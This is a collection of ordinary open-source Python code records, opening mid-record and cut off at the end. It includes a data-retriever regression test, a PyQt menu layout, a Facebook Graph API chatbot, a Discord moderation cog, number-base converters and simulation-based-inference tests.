'data_dir': DATA_DIR}\n interface_opts = {'table_name': '{db}_output_{table}.csv'}\n assert get_csv_md5(dataset, csv_engine, tmpdir, install_csv, interface_opts) == expected\n\n\n@pytest.mark.parametrize(\"dataset, expected\", download_md5)\ndef test_download_regression(dataset, expected):\n \"\"\"Test download regression.\"\"\"\n os.chdir(retriever_root_dir)\n download(dataset, \"raw_data/{0}\".format(dataset))\n current_md5 = getmd5(data=\"raw_data/{0}\".format(dataset), data_type='dir')\n assert current_md5 == expected\n\n\n# @pytest.mark.parametrize(\"dataset, expected\", fetch_tests)\ndef test_fetch():\n \"\"\"Test fetch interface\"\"\"\n for dataset, expected in fetch_tests:\n data_frame = fetch(dataset)\n for itm in expected:\n for table_i in itm:\n expected_data = itm[table_i][0]\n expected_column_values = itm[table_i][1]\n column_values = list(data_frame[table_i].dtypes.index)\n first_row_data = list(data_frame[table_i].iloc[0])\n assert expected_data == first_row_data\n assert expected_column_values == column_values\n\n\ndef test_interface_table_registry():\n # Test if script_table_registry keeps only the latest\n # table names of the installed data packages in\n # script_table_registry\n install_csv(\"iris\")\n wine_data = fetch(\"wine-composition\")\n assert \"iris\" not in wine_data.keys()\n\n\n@pytest.mark.parametrize(\"dataset, expected\", fetch_order_tests)\ndef test_fetch_order(dataset, expected):\n \"\"\"Test fetch dataframe order\"\"\"\n data_frame_dict = fetch(dataset)\n assert list(data_frame_dict.keys()) == expected\n\n@pytest.mark.parametrize(\"dataset, cols, expected\", spatial_db_md5)\ndef test_postgres_spatial(dataset, cols, expected, tmpdir):\n \"\"\"Check for postgres regression.\"\"\"\n cmd = 'psql -U postgres -d ' + testdb_retriever + ' -h ' + pgdb_host + ' -w -c \\\"DROP SCHEMA IF EXISTS ' + testschema + ' CASCADE\\\"'\n subprocess.call(shlex.split(cmd))\n postgres_engine.opts = {'engine': 'postgres',\n 'user': 'postgres',\n 'password': os_password,\n 'host': pgdb_host,\n 'port': 5432,\n 'database': testdb_retriever,\n 'database_name': testschema,\n 'table_name': '{db}.{table}'}\n interface_opts = {\"user\": 'postgres',\n # \"password\": postgres_engine.opts['password'],\n 'host': postgres_engine.opts['host'],\n 'port': postgres_engine.opts['port'],\n \"database\": postgres_engine.opts['database'],\n \"database_name\": postgres_engine.opts['database_name'],\n \"table_name\": postgres_engine.opts['table_name']}\n assert get_csv_md5(dataset, postgres_engine, tmpdir, install_postgres, interface_opts, cols) == expected\n","repo_name":"OwenMcDonnell/retriever","sub_path":"test/test_regression.py","file_name":"test_regression.py","file_ext":"py","file_size_in_byte":13524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"} +{"seq_id":"70046941956","text":"from PyQt4.QtCore import *\nfrom PyQt4.QtGui import *\n\nimport sys\n\nself.change_record_button = QPushButton(\"Change Student's Record\")\nself.change_recordFont = QFont()\nself.change_recordFont.setPointSize(13)\nself.change_record_button.setFont(self.change_recordFont)\nself.change_record_button.setMinimumSize(10,30)\nself.change_difficulty_button = QPushButton(\"Change Game Difficulty\")\nself.change_difficultyFont = QFont()\nself.change_difficultyFont.setPointSize(13)\nself.change_difficulty_button.setFont(self.change_difficultyFont)\nself.change_difficulty_button.setMinimumSize(10,30)\nself.clear_data_button = QPushButton(\"Clear all data from school file\")\nself.clear_dataFont = QFont()\nself.clear_dataFont.setPointSize(13)\nself.clear_data_button.setFont(self.clear_dataFont)\nself.clear_data_button.setMinimumSize(10,30)\n\nself.layout = QVBoxLayout()\nself.bottom_layout = QGridLayout()\nself.middle_layout = QGridLayout()\nself.top_layout = QHBoxLayout()\n\nself.layout.addLayout(self.top_layout)\nself.layout.addLayout(self.middle_layout)\nself.layout.addLayout(self.bottom_layout)\n\nself.Options_widget = QWidget()\nself.Options_widget.setLayout(self.layout)\n\nself.PrimaryMathsTitle = QLabel(\"Primary Maths Game (Options)\")\nself.PrimaryMathsTitle.setAlignment(Qt.AlignCenter)\n\nPrimaryMathsTitleFont = QFont()\nPrimaryMathsTitleFont.setPointSize(15)\nPrimaryMathsTitleFont.setBold(True)\nself.PrimaryMathsTitle.setFont(PrimaryMathsTitleFont)\n\n#self.OptionsTitle = QLabel(\"Options\")\n#self.OptionsTitle.setAlignment(Qt.AlignCenter|Qt.AlignBottom)\n\n#self.OptionsTitle.setFont(PrimaryMathsTitleFont) \n\nself.top_layout.addWidget(self.PrimaryMathsTitle)\n#self.top_layout.addWidget(self.OptionsTitle)\nself.middle_layout.addWidget(self.change_difficulty_button,0,1)\nself.middle_layout.addWidget(self.change_record_button,1,1)\nself.middle_layout.addWidget(self.clear_data_button,2,1)\n\n\nself.setCentralWidget(self.Options_widget)\nself.Options_widget.setMinimumSize(QSize(450,300))\n","repo_name":"Riltro/Implementation","sub_path":"GUIs/Testing_stacked.py","file_name":"Testing_stacked.py","file_ext":"py","file_size_in_byte":1963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3903382517","text":"import os\nimport facebook\nfrom logs import (write_log, STATUS_FILE,\n print_write_chatbot, input_user_chat)\nfrom utils.utils import get_credentials\n\n\ndef show_albums(facebook_api: facebook.GraphAPI, albums_id: list) -> None:\n \"\"\" \n Prints a list of albums of the user\n \n Arguments:\n facebook_api (facebook.GraphAPI)\n albums_id (list): Contains the albums of the user\n \n \n \"\"\"\n albums = facebook_api.get_connections(id = 'me', connection_name = 'albums')\n info_list = albums['data']\n print_write_chatbot(\"Your albums are: \")\n for count, info in enumerate(info_list, 1):\n print(count, info[\"name\"])\n albums_id.append(info[\"id\"])\n\n\ndef validate_number(number: int, list_: list) -> int:\n \"\"\"\n Validates the input put by the user\n \n Arguments:\n number (int): Number of the list selected\n list_ (list): Contains the list of the user\n \n Returns:\n int - The value of the input given by the user\n \"\"\"\n while number not in range(len(list_)):\n number = int(input_user_chat(\"re select: \"))\n return number\n\n\ndef upload_to_albums(facebook_api: facebook.GraphAPI) -> None:\n \"\"\"\n Uploads a picture from the user to the album the user must select\n \n Arguments:\n facebook_api (object) : facebook api graph\n \n \"\"\"\n \n path = input_user_chat(\"Please enter the path of your picture: \")\n if path:\n albums_id = []\n show_albums(facebook_api, albums_id)\n select = int(input_user_chat(\"Select the album: \")) - 1\n select = validate_number(select, albums_id)\n caption = input_user_chat(\"Caption: \")\n try:\n facebook_api.put_photo(image = open(path, 'rb'), album_path = albums_id[select - 1] + \"/photos\",\n message = caption)\n print_write_chatbot(\"The photo has been uploaded successfully!\", color = \"green\",\n attrs_color = [\"bold\"])\n except Exception as error:\n write_log(STATUS_FILE, f\"There was a problem opening the file, error: {error}\", \"Exception\")\n print_write_chatbot(f\"There was a problem opening the file, error: {error}\", color = \"red\",\n attrs_color = [\"bold\"])\n\n\ndef search_file() -> str:\n \"\"\"\n A file is searched and validated based on an absolute path\n \n Returns:\n str - Absoulte path of file\n \n \"\"\"\n found_file = False\n path = ''\n while not found_file:\n path = os.path.abspath(input_user_chat(\"Enter the file path, the file must be .jpg: \"))\n if os.path.exists(path):\n found_file = True\n else:\n print_write_chatbot(f\"The path doesnt exists, please enter a correct path \\n\", color = \"red\",\n attrs_color = [\"bold\"])\n return path\n\n\ndef upload_photo(facebook_api: facebook.GraphAPI) -> None:\n \"\"\"\n Asks the user the path of the photo and the caption\n the user wants to upload, and uploads the photo and the caption\n \n Arguments:\n facebook_api (object) : facebook api graphThe facebook api\n \n \"\"\"\n path = search_file()\n caption = input_user_chat(\"Caption: \")\n try:\n facebook_api.put_photo(image = open(path, 'rb'), message = caption)\n print_write_chatbot(\"The photo has been uploaded successfully!\", color = 'green', attrs_color = [\"bold\"])\n except Exception as error:\n write_log(STATUS_FILE, f\"There was a problem uploading the file, error: {error}\", 'Exception')\n print_write_chatbot(f\"There was a problem uploading the file, error: {error}\", color = \"red\",\n attrs_color = [\"bold\"])\n\n\ndef upload_post(facebook_api: facebook.GraphAPI) -> None:\n \"\"\"\n Uploads the post written by the user and prints the success of the action if there are no errors \n \n Arguments:\n facebook_api (object) : facebook api graph\n \n \"\"\"\n user_message = input_user_chat(\"What would you like to write?: \")\n try:\n facebook_api.put_object(parent_object = 'me', connection_name = 'feed', message = user_message)\n print_write_chatbot(\"Posting has been updated successfully!\\n\", color = 'green', attrs_color = [\"bold\"])\n except Exception as err:\n write_log(STATUS_FILE, str(err), 'Exception')\n print_write_chatbot(f\"Error to upload a post {err}\", color = \"red\", attrs_color = ['bold'])\n\n\ndef follower_count(facebook_api: facebook.GraphAPI) -> None:\n \"\"\"\n Prints the count of followers of the page\n \n Arguments:\n facebook_api (object) : facebook api graph\n \n \"\"\"\n \n followers = facebook_api.get_object(id = 'me', fields = 'followers_count')\n print_write_chatbot(f\"Number of followers: {str(followers['followers_count'])}\\n\")\n\n\ndef like(facebook_api: facebook.GraphAPI, selection: int) -> None:\n \"\"\"\n Likes the selection and prints the success of the action\n \n Arguments:\n facebook_api (object) : facebook api graph\n selection (int) : The number of the post the user selected\n \n Returns:\n object - (facebook_api)\n \"\"\"\n facebook_api.put_like(object_id = selection)\n print_write_chatbot(\"The post has been liked successfully!\\n\", color = 'green', attrs_color = [\"bold\"])\n\n\ndef comment(facebook_api: facebook.GraphAPI, selection: int) -> None:\n \"\"\"\n Ask what would you like to comment, comments your response and prints the success of the action\n \n Arguments:\n facebook_api (object) : facebook api graph\n selection (int) : The number of the post the user selected\n \n Returns:\n object - (facebook_api)\n \"\"\"\n text = input_user_chat(\"What would you like to comment: \").capitalize()\n facebook_api.put_comment(object_id = selection, message = text)\n print_write_chatbot(\"It has been successfully commented!\\n\", color = 'green', attrs_color = [\"bold\"])\n\n\ndef delete_post(facebook_api: facebook.GraphAPI, selection: str) -> None:\n \"\"\"\n Deletes the selected post\n \n Arguments:\n facebook_api (object) : facebook api graph\n selection (int) : The number of the post the user selected\n \n Returns:\n object - (facebook_api)\n \"\"\"\n facebook_api.delete_object(id = selection)\n print_write_chatbot(\"The post has been successfully removed!\\n\", color = 'green', attrs_color = [\"bold\"])\n\n\ndef edit_post(facebook_api: facebook.GraphAPI, selection: int, message: str) -> None:\n \"\"\"\n Edits the selection and prints the success of the action \n \n Arguments:\n facebook_api (object) : facebook api graph\n selection (int) : The number of the post the user selected \n message (str) : New message of post\n \n Returns:\n object - (facebook_api)\n \"\"\"\n facebook_api.put_object(parent_object = selection, connection_name = '', message = message)\n print_write_chatbot(\"Posting has been updated successfully!\\n\", color = 'green', attrs_color = [\"bold\"])\n\n\ndef if_text_in_info(info: dict, posts_id: list, count: int):\n \"\"\"\n Prints the number, the created time and the contend of the post,\n and appends its id in the post_id list\n\n Arguments:\n info (dict) : Data of the posts in the graph\n posts_id (list) : List of the posts of the page\n count (int) : The number of the post\n\n \"\"\"\n \n if \"message\" in info:\n text_description = f\": {info['message']}\"\n elif \"story\" in info:\n text_description = f\": {info['story']}\"\n else:\n text_description = ''\n \n print_write_chatbot(f\"{count}, {info['created_time'][0:10]} {text_description}\")\n posts_id.append(info[\"id\"])\n\n\ndef get_posts(facebook_api: facebook.GraphAPI, type_post: str) -> dict:\n \"\"\"\n Returns own posts or visitor posts based on type_post\n \n Arguments:\n facebook_api (facebook.GraphAPI) : object facebook API\n type_post (str) : indicator of type posts (Ej published_posts, visitor_posts)\n \n Returns:\n dict\n \"\"\"\n return facebook_api.get_connections(id = 'me', connection_name = type_post)\n\n\ndef post_related(facebook_api: facebook.GraphAPI, action: str, selected: str) -> None:\n \"\"\"\n The posts of the page are shown and depending on the action, it will be edited / liked/ deleted / commented\n \n Arguments:\n facebook_api (object) : facebook api graph\n action (str) : The action the user wants to do\n selected (str) : The connection name the user selected\n \n \"\"\"\n posts_id = []\n selection = 0\n posts = get_posts(facebook_api, selected)\n info_list = posts['data']\n print_write_chatbot(\"The posts are: \")\n for count, info in enumerate(info_list, start = 1):\n if_text_in_info(info, posts_id, count)\n \n if action != \"read\":\n option = int(input_user_chat(\"Select one: \")) - 1\n option = validate_number(option, posts_id)\n selection = posts_id[option]\n \n try:\n if action == \"like\":\n like(facebook_api, selection)\n elif action == \"comment\":\n comment(facebook_api, selection)\n elif action == \"delete\":\n delete_post(facebook_api, selection)\n elif action == \"edit\":\n text = input_user_chat(\"Enter the new caption: \").capitalize()\n edit_post(facebook_api, selection, message = text)\n \n except Exception as error:\n write_log(STATUS_FILE, str(error), 'Exception')\n print_write_chatbot(f\"Error {error}\", color = \"red\", attrs_color = [\"bold\"])\n\n\n# ------------ CONNECTION ---------------#\n\n\ndef connection_api(user_credentials: dict = {}) -> object:\n \"\"\"\n If the user does not enter their credentials, those of crux are used.\n Returns the facebook Api and checks if there was any error while connecting to Facebook\n \n Arguments:\n user_credentials (str): users token\n \n Returns:\n object - (facebook_api)\n \"\"\"\n facebook_api = ''\n if not user_credentials:\n credentials = get_credentials()\n page_token = credentials['facebook']['token']\n else:\n page_token = user_credentials[\"token\"]\n \n try:\n facebook_api = facebook.GraphAPI(access_token = page_token, version = \"2.12\")\n except Exception as err:\n write_log(STATUS_FILE, str(err), 'Exception')\n print(\"Error\")\n else:\n write_log(STATUS_FILE, 'Successfully connected with Facebook the api', 'GraphAPI')\n print_write_chatbot('You have successfully connected with the Facebook api!\\n', color = 'green',\n attrs_color = [\"bold\"])\n \n return facebook_api\n","repo_name":"FrancoSecchi/instagram-facebook-bot","sub_path":"apis/facebook.py","file_name":"facebook.py","file_ext":"py","file_size_in_byte":10673,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"9682909449","text":"import discord \r\nfrom discord.ext import commands\r\nimport os\r\nfrom dotenv import load_dotenv\r\nimport random\r\nimport json\r\nimport asyncio\r\nfrom PIL import Image,ImageFont,ImageDraw\r\nfrom io import BytesIO\r\nimport datetime\r\nimport DiscordUtils\r\nimport praw\r\n\r\nclass Moderations(commands.Cog):\r\n \r\n def __init__(self,bot):\r\n self.bot = bot\r\n @commands.Cog.listener() \r\n async def on_ready(self):\r\n print('moderation command loaded')\r\n \r\n @commands.command()\r\n @commands.has_permissions(administrator = True)\r\n async def changeprefix(self,ctx, prefix):\r\n\r\n with open(\"prefixes.json\", \"r\") as f:\r\n prefixes = json.load(f)\r\n\r\n prefixes[str(ctx.guild.id)] = prefix\r\n\r\n with open(\"prefixes.json\", \"w\") as f:\r\n json.dump(prefixes,f) \r\n\r\n await ctx.send(f\"The prefix was changed to {prefix}\")\r\n await ctx.guild.me.edit(nick=f'[{prefix}] Noahbot')\r\n\r\n @commands.command()\r\n @commands.has_permissions(manage_channels =True)\r\n async def purge(self,ctx,amount = 5):\r\n await ctx.channel.purge(limit = amount)\r\n \r\n @commands.command()\r\n async def mute(self,ctx, member: discord.Member,time: int,d,*,reason = None):\r\n guild = ctx.guild\r\n if discord.utils.get(ctx.guild.roles,name = \"Muted\"):\r\n await ctx.send(\"Mute role already exists!\")\r\n var = discord.utils.get(ctx.guild.roles,name = \"Muted\")\r\n for channel in guild.channels:\r\n await channel.set_permissions(var, speak=False, send_messages=False)\r\n await member.add_roles(var)\r\n embed = discord.Embed(title=\"muted!\", description=f\"{member.mention} has been muted \", colour=discord.Colour.light_gray())\r\n embed.add_field(name=\"reason:\", value=reason, inline=False)\r\n embed.add_field(name=\"time left for the mute:\", value=f\"{time}{d}\", inline=False)\r\n await ctx.send(embed=embed)\r\n if d == \"s\":\r\n await asyncio.sleep(time)\r\n\r\n if d == \"m\":\r\n await asyncio.sleep(time*60)\r\n\r\n if d == \"h\":\r\n await asyncio.sleep(time*60*60)\r\n\r\n if d == \"d\":\r\n await asyncio.sleep(time*60*60*24)\r\n\r\n await member.remove_roles(var)\r\n embed = discord.Embed(title=\"unmute (temp) \", description=f\"unmuted -{member.mention} \", colour=discord.Colour.light_gray())\r\n await ctx.send(embed=embed)\r\n\r\n else:\r\n await guild.create_role(name = \"Muted\",color = discord.Color(0x0062ff))\r\n var = discord.utils.get(ctx.guild.roles,name = \"Muted\")\r\n for channel in guild.channels:\r\n await channel.set_permissions(var, speak=False, send_messages=False)\r\n await ctx.send(\"Muted role created!\")\r\n await member.add_roles(var)\r\n embed = discord.Embed(title=\"muted!\", description=f\"{member.mention} has been tempmuted \", colour=discord.Colour.light_gray())\r\n embed.add_field(name=\"reason:\", value=reason, inline=False)\r\n embed.add_field(name=\"time left for the mute:\", value=f\"{time}{d}\", inline=False)\r\n await ctx.send(embed=embed)\r\n if d == \"s\":\r\n await asyncio.sleep(time)\r\n\r\n if d == \"m\":\r\n await asyncio.sleep(time*60)\r\n\r\n if d == \"h\":\r\n await asyncio.sleep(time*60*60)\r\n\r\n if d == \"d\":\r\n await asyncio.sleep(time*60*60*24)\r\n\r\n await member.remove_roles(var)\r\n embed = discord.Embed(title=\"unmute (temp) \", description=f\"unmuted -{member.mention} \", colour=discord.Colour.light_gray())\r\n await ctx.send(embed=embed)\r\n\r\n \r\n\r\n @commands.command()\r\n async def deletechannel(self,ctx,channel:discord.TextChannel):\r\n embed = discord.Embed(\r\n title = \"Success\",\r\n description = f\"Channel:{channel} has been deleted\"\r\n )\r\n if ctx.author.guild_permissions.manage_channels == True:\r\n await ctx.send(embed = embed)\r\n await channel.delete()\r\n else:\r\n await ctx.send(\"you cannot delete a channel get perms noob!\")\r\n \r\n @commands.command()\r\n async def createchannel(self,ctx , channel):\r\n guild = ctx.guild\r\n embed = discord.Embed(\r\n title = \"Success\",\r\n description = f\"Channel:{channel} has been created\"\r\n )\r\n if ctx.author.guild_permissions.manage_channels == True:\r\n await guild.create_text_channel(name ='{}'.format(channel))\r\n await ctx.send(embed=embed)\r\n else:\r\n await ctx.send(\"you cannot create a channel get perms noob!\")\r\n \r\n @commands.command(name=\"ban\")\r\n async def ban(self, context, member: discord.Member, *args):\r\n if context.message.author.guild_permissions.administrator:\r\n try:\r\n if member.guild_permissions.administrator:\r\n embed = discord.Embed(\r\n title=\"Error!\",\r\n description=\"User has Admin permissions.\",\r\n color=0x00FF00\r\n )\r\n await context.send(embed=embed)\r\n else:\r\n reason = \" \".join(args)\r\n embed = discord.Embed(\r\n title=\"User Banned!\",\r\n description=f\"**{member}** was banned by **{context.message.author}**!\",\r\n color=0x00FF00\r\n )\r\n embed.add_field(\r\n name=\"Reason:\",\r\n value=reason\r\n )\r\n await context.send(embed=embed)\r\n await member.send(f\"You were banned by **{context.message.author}**!\\nReason: {reason}\")\r\n await member.ban(reason=reason)\r\n except:\r\n embed = discord.Embed(\r\n title=\"Error!\",\r\n description=\"An error occurred while trying to ban the user.\",\r\n color=0x00FF00\r\n )\r\n await context.send(embed=embed)\r\n else:\r\n embed = discord.Embed(\r\n title=\"Error!\",\r\n description=\"You don't have the permission to use this command.\",\r\n color=0x00FF00\r\n )\r\n await context.send(embed=embed)\r\n\r\n @commands.command()\r\n @commands.has_permissions(ban_members = True)\r\n async def unban(self,ctx, * , member):\r\n banned_users = await ctx.guild.bans()\r\n member_name,member_disc = member.split(\"#\")\r\n for banned_entry in banned_users:\r\n user = banned_entry.user\r\n if(user.name,user.discriminator) == (member_name,member_disc):\r\n await ctx.guild.unban(user)\r\n await ctx.send(member_name + \" has been unbanned XD!\")\r\n return\r\n await ctx.send(member+ \" was not found! **disappeared??**\")\r\n \r\n @commands.command(name='kick', pass_context=True)\r\n async def kick(self, context, member: discord.Member, *args):\r\n if context.message.author.guild_permissions.kick_members:\r\n if member.guild_permissions.administrator:\r\n embed = discord.Embed(\r\n title=\"Error!\",\r\n description=\"User has Admin permissions.\",\r\n color=0x00FF00\r\n )\r\n await context.send(embed=embed)\r\n else:\r\n try:\r\n reason = \" \".join(args)\r\n embed = discord.Embed(\r\n title=\"User Kicked!\",\r\n description=f\"**{member}** was kicked by **{context.message.author}**!\",\r\n color=0x00FF00\r\n )\r\n embed.add_field(\r\n name=\"Reason:\",\r\n value=reason\r\n )\r\n await context.send(embed=embed)\r\n try:\r\n await member.send(\r\n f\"You were kicked by **{context.message.author}**!\\nReason: {reason}\"\r\n )\r\n except:\r\n pass\r\n except:\r\n embed = discord.Embed(\r\n title=\"Error!\",\r\n description=\"An error occurred while trying to kick the user.\",\r\n color=0x00FF00\r\n )\r\n await context.message.channel.send(embed=embed)\r\n else:\r\n embed = discord.Embed(\r\n title=\"Error!\",\r\n description=\"You don't have the permission to use this command.\",\r\n color=0x00FF00\r\n )\r\n await context.send(embed=embed)\r\n \r\n @commands.command(name=\"warn\")\r\n async def warn(self, context, member: discord.Member, *args):\r\n if context.message.author.guild_permissions.administrator:\r\n reason = \" \".join(args)\r\n embed = discord.Embed(\r\n title=\"User Warned!\",\r\n description=f\"**{member}** was warned by **{context.message.author}**!\",\r\n color=0x00FF00\r\n )\r\n embed.add_field(\r\n name=\"Reason:\",\r\n value=reason\r\n )\r\n await context.send(embed=embed)\r\n try:\r\n await member.send(f\"You were warned by **{context.message.author}**!\\nReason: {reason}\")\r\n except:\r\n pass\r\n else:\r\n embed = discord.Embed(\r\n title=\"Error!\",\r\n description=\"You don't have the permission to use this command.\",\r\n color=0x00FF00\r\n )\r\n await context.send(embed=embed)\r\n @commands.command(name=\"poll\")\r\n async def poll(self, context, *args):\r\n poll_title = \" \".join(args)\r\n embed = discord.Embed(\r\n title=\"A new poll has been created!\",\r\n description=f\"{poll_title}\",\r\n color=0x00FF00\r\n )\r\n embed.set_footer(\r\n text=f\"Poll created by: {context.message.author} Рђб React to vote!\"\r\n )\r\n embed_message = await context.send(embed=embed)\r\n await embed_message.add_reaction(\"­ЪЉЇ\")\r\n await embed_message.add_reaction(\"­ЪЉј\")\r\n await embed_message.add_reaction(\"­Ъци\")\r\n \r\n @commands.has_permissions(manage_channels = True)\r\n @commands.command(name = \"createvoice\")\r\n async def createvoice(self,ctx,name,*,bitrate:int = None,user_limit:int = None):\r\n if bitrate == None:\r\n await ctx.send(\"Please give bitrate (recommended : 64)\")\r\n if user_limit == None:\r\n await ctx.send(\"Please give user limit\")\r\n else:\r\n return\r\n else:\r\n await ctx.guild.create_voice_channel(name = name,bitrate = bitrate*1000,user_limit=user_limit)\r\n\r\n @commands.has_permissions(manage_guild = True)\r\n @commands.command(name = \"editserver\")\r\n async def editserver(self,ctx,name:str=None,description:str = None,icon:bytes =None,banner:bytes=None,owner=discord.Member):\r\n try:\r\n await ctx.guild.edit(name = name,description = description,icon = icon,banner=banner,owner=owner)\r\n except discord.Forbidden:\r\n await ctx.send(\"you dont have permissions to do that noob!\")\r\n except discord.HTTPException:\r\n await ctx.send(\"failed editing the server\")\r\n except discord.InvalidArgument:\r\n await ctx.send(\"something went wrong!\")\r\n\r\n\r\n\r\n @commands.has_permissions(manage_guild = True)\r\n @commands.command(name = \"makerole\")\r\n async def createrole(self,ctx,name,color):\r\n dictOfColors = { 'default' : discord.Color.default(),\r\n 'teal' : discord.Color.teal(),\r\n 'darkteal' : discord.Color.dark_teal(),\r\n 'green' : discord.Color.green(),\r\n 'darkgreen' : discord.Color.dark_green(),\r\n 'blue' : discord.Color.blue(),\r\n 'purple' : discord.Color.purple(),\r\n 'darkpurple' : discord.Color.dark_purple(),\r\n 'magenta' : discord.Color.magenta(),\r\n 'darkmagenta' : discord.Color.dark_magenta(),\r\n 'gold' : discord.Color.gold(),\r\n 'darkgold' : discord.Color.dark_gold(),\r\n 'orange' : discord.Color.orange(),\r\n 'darkorange' : discord.Color.dark_orange(),\r\n 'red' : discord.Color.red(),\r\n 'darkred' : discord.Color.dark_red() }\r\n guild = ctx.guild\r\n await guild.create_role(name = name,color = dictOfColors[color])\r\n await ctx.send(f\"Role `{name}` has been created!\")\r\n\r\n\r\n\r\n\r\n @commands.has_permissions(manage_guild = True)\r\n @commands.command()\r\n async def giverole(self,ctx, member: discord.Member,name: str,color):\r\n dictOfColors = { 'default' : discord.Color.default(),\r\n 'teal' : discord.Color.teal(),\r\n 'darkteal' : discord.Color.dark_teal(),\r\n 'green' : discord.Color.green(),\r\n 'darkgreen' : discord.Color.dark_green(),\r\n 'blue' : discord.Color.blue(),\r\n 'purple' : discord.Color.purple(),\r\n 'darkpurple' : discord.Color.dark_purple(),\r\n 'magenta' : discord.Color.magenta(),\r\n 'darkmagenta' : discord.Color.dark_magenta(),\r\n 'gold' : discord.Color.gold(),\r\n 'darkgold' : discord.Color.dark_gold(),\r\n 'orange' : discord.Color.orange(),\r\n 'darkorange' : discord.Color.dark_orange(),\r\n 'red' : discord.Color.red(),\r\n 'darkred' : discord.Color.dark_red() }\r\n guild = ctx.guild\r\n if discord.utils.get(ctx.guild.roles,name = name):\r\n await ctx.send(f\"`{name}` role already exists!\")\r\n var = discord.utils.get(ctx.guild.roles,name = name)\r\n for channel in guild.channels:\r\n await channel.set_permissions(var, speak=True, send_messages=True)\r\n await member.add_roles(var)\r\n await ctx.send(f\"{name} role given to {member.mention}\")\r\n else:\r\n await guild.create_role(name = name,color = dictOfColors[color])\r\n var = discord.utils.get(ctx.guild.roles,name = name)\r\n for channel in guild.channels:\r\n await channel.set_permissions(var, speak=True, send_messages=True)\r\n await ctx.send(f\"`{name}` role created!\")\r\n await member.add_roles(var)\r\n await ctx.send(f\"{name} role given to {member.mention}\")\r\n \r\n\r\n\r\n\r\ndef setup(bot):\r\n bot.add_cog(Moderations(bot))","repo_name":"The-DarK-os/theNoah","sub_path":"Cogs/moderation.py","file_name":"moderation.py","file_ext":"py","file_size_in_byte":15205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5495714570","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@Author: 'Zhang'\n\"\"\"\nfrom model.Message import Message\nfrom routes.routes_index import http_response\nfrom utils import log, template\n\n\ndef messages_index(request):\n\tlog('本次请求的 method', request.method)\n\tdata = request.query\n\tif len(data) > 0:\n\t\tMessage.new(data)\n\t# 处理msg便于输出\n\tbody = template('message.html', messages=Message.all())\n\treturn http_response(body)\n\n\ndef messages_add(request):\n\tlog('本次请求的 method', request.method)\n\tdata = request.form()\n\tif len(data) > 0:\n\t\tMessage.new(data)\n\tbody = template('message.html', messages=Message.all())\n\treturn http_response(body)\n","repo_name":"AlvinZhn/web_framwork","sub_path":"routes/routes_message.py","file_name":"routes_message.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22611985636","text":"from Decimal import *\nfrom Binary import *\n\nclass Octal():\n\n def isOctal(self, oct):\n aux=list(str(oct))\n for digit in aux:\n if (int(digit) < 0) or (int(digit) > 7):\n return False\n return True\n\n def toDecimal(self, oct):\n aux=list(str(oct)[::-1])\n num=0\n for i,digit in enumerate(aux):\n num+=int(digit)*pow(8, i)\n return num\n\n def toBinary(self, oct):\n aux=list(str(oct))\n n=Decimal()\n bin=\"\"\n for digit in aux:\n aux1=n.toBinary(int(digit))\n mod=len(aux1)%3\n if mod > 0:\n for i in range(3-(mod)):\n aux1=\"0\"+aux1\n bin+=aux1\n for i in range(3):\n if bin[0] == \"0\":\n bin=bin[1::]\n return bin\n\n def toHexadecimal(self, oct):\n return Binary().toHexadecimal(self.toBinary(oct))","repo_name":"OscarGutierrez312/ConversorSistemasNumericos","sub_path":"Octal.py","file_name":"Octal.py","file_ext":"py","file_size_in_byte":921,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23543793503","text":"import numpy as np\n\n\ndef randomized_select(A,p,r,i):\n if p==r:\n return A[p]\n q=randomized_partition(A,p,r)\n\n k=q-p+1\n if i==k:\n return A[q]\n elif i bool:\n return True\n\n prior = MultivariateNormal(prior_mean, prior_cov)\n potential_fn = TractablePotential(prior=prior)\n theta_transform = torch_tf.identity_transform\n\n posterior = VIPosterior(potential_fn, prior, theta_transform=theta_transform)\n posterior.set_default_x(torch.tensor(np.zeros((num_dim,)).astype(np.float32)))\n posterior.vi_method = vi_method\n posterior.train()\n samples = posterior.sample((num_samples,), method=sampling_method)\n samples = torch.as_tensor(samples, dtype=torch.float32)\n\n check_c2st(samples, target_samples, alg=\"slice_np\")\n\n\n@pytest.mark.slow\n@pytest.mark.parametrize(\"num_dim\", (1, 2))\n@pytest.mark.parametrize(\"q\", (\"maf\", \"nsf\", \"gaussian_diag\", \"gaussian\", \"mcf\", \"scf\"))\ndef test_c2st_vi_flows_on_Gaussian(num_dim: int, q: str):\n \"\"\"Test VI on Gaussian, comparing to ground truth target via c2st.\n\n Args:\n num_dim: parameter dimension of the gaussian model\n vi_method: different vi methods\n sampling_method: Different sampling methods\n\n \"\"\"\n # Coupling flows undefined at 1d\n if num_dim == 1 and q in [\"mcf\", \"scf\"]:\n return\n\n num_samples = 2000\n\n likelihood_shift = -1.0 * ones(num_dim)\n likelihood_cov = 0.3 * eye(num_dim)\n prior_mean = zeros(num_dim)\n prior_cov = eye(num_dim)\n\n x_o = zeros((1, num_dim))\n target_distribution = true_posterior_linear_gaussian_mvn_prior(\n x_o[0], likelihood_shift, likelihood_cov, prior_mean, prior_cov\n )\n target_samples = target_distribution.sample((num_samples,))\n\n class TractablePotential(BasePotential):\n def __call__(self, theta, **kwargs):\n return target_distribution.log_prob(\n torch.as_tensor(theta, dtype=torch.float32)\n )\n\n def allow_iid_x(self) -> bool:\n return True\n\n prior = MultivariateNormal(prior_mean, prior_cov)\n potential_fn = TractablePotential(prior=prior)\n theta_transform = torch_tf.identity_transform\n\n posterior = VIPosterior(potential_fn, prior, theta_transform=theta_transform, q=q)\n posterior.set_default_x(torch.tensor(np.zeros((num_dim,)).astype(np.float32)))\n posterior.train(n_particles=1000, eps=1e-8)\n samples = posterior.sample((num_samples,))\n samples = torch.as_tensor(samples, dtype=torch.float32)\n\n check_c2st(samples, target_samples, alg=\"slice_np\")\n\n\n@pytest.mark.slow\n@pytest.mark.parametrize(\"num_dim\", (1, 